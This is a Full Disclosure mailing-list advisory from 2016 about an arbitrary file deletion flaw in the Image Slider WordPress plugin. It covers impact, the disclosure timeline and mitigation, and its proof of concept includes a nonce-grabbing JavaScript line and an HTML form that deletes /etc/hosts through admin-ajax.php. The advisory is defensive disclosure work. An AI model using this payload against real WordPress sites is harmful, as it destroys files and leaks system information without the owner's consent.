[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Arbitrary file deletion vulnerability in Image Slider allows authenticated users to delete files (WordPress plugin)
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Arbitrary file deletion vulnerability in Image Slider allows authenticated users to delete files (WordPress plugin)
- From: dxw Security <security@xxxxxxx>
- Date: Fri, 23 Dec 2016 14:47:34 +0000
Details
================
Software: Image Slider
Version: 1.1.41,1.1.89
Homepage: http://wordpress.org/plugins/image-slider-widget/
Advisory report:
https://security.dxw.com/advisories/arbitrary-file-deletion-vulnerability-in-image-slider-allows-authenticated-users-to-delete-files/
CVE: Awaiting assignment
CVSS: 5.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:N)
Description
================
Arbitrary file deletion vulnerability in Image Slider allows authenticated
users to delete files
Vulnerability
================
Any user able to create or edit “Sliders” (the same users who can create/edit
posts, as far as I can tell) is able to delete arbitrary files that the web
user has permission to write to. In addition, the attacker is told whether that
operation succeeded or failed.
Depending on configuration this could lead to the attacker being able to:
Delete media uploads
Delete plugin files (this would be especially bad if there were security
plugins limiting the attacker’s abilities)
Delete important system files (/etc/hosts, /usr/bin/php)
Attempt to delete unimportant files in order to discover more information about
the system (i.e. attempting to delete /usr/share/doc/apt/changelog.gz would
have little effect on the system if successful but it would tell the attacker
that the host is running a Debian derivative)
Proof of concept
================
First, make sure you have a file to delete. I’m going to use /etc/hosts as an
example because it demonstrates that you’re not limited to files within the
WordPress installation, but make sure whichever file you use can be deleted by
the user account WordPress is running under
Visit /wp-admin/post-new.php?post_type=easyimageslider
Input the following JavaScript in the inspector’s console to get the nonce
value: document.querySelector(\'[data-tnonce]\').dataset[\'tnonce\']
Create a page containing the following code, replace NONCE with the nonce you
got in the previous step, visit the page and click submit
<form action=\"http://localhost/wp-admin/admin-ajax.php\"; method=\"POST\">
<input type=\"text\" name=\"action\" value=\"ewic_timthumb_check\">
<input type=\"text\" name=\"turl\" value=\"/etc/hosts\">
<input type=\"text\" name=\"security\" value=\"NONCE\">
<input type=\"submit\">
</form>
If WordPress is being run as root (or if the web user has permission to write
to that file) then the page will display “1”, if not it won’t display anything.
Mitigations
================
Disable the plugin. No fixed version is known.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@xxxxxxx to acknowledge this report if you
received it via a third party (for example, plugins@xxxxxxxxxxxxx) as they
generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this
report with 14 days.
Timeline
================
2015-10-29: Discovered
2016-12-09: Reported to vendor via info@xxxxxxxxxxxx
2016-12-23: Vendor has not responded after 14 days
2016-12-23: Published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/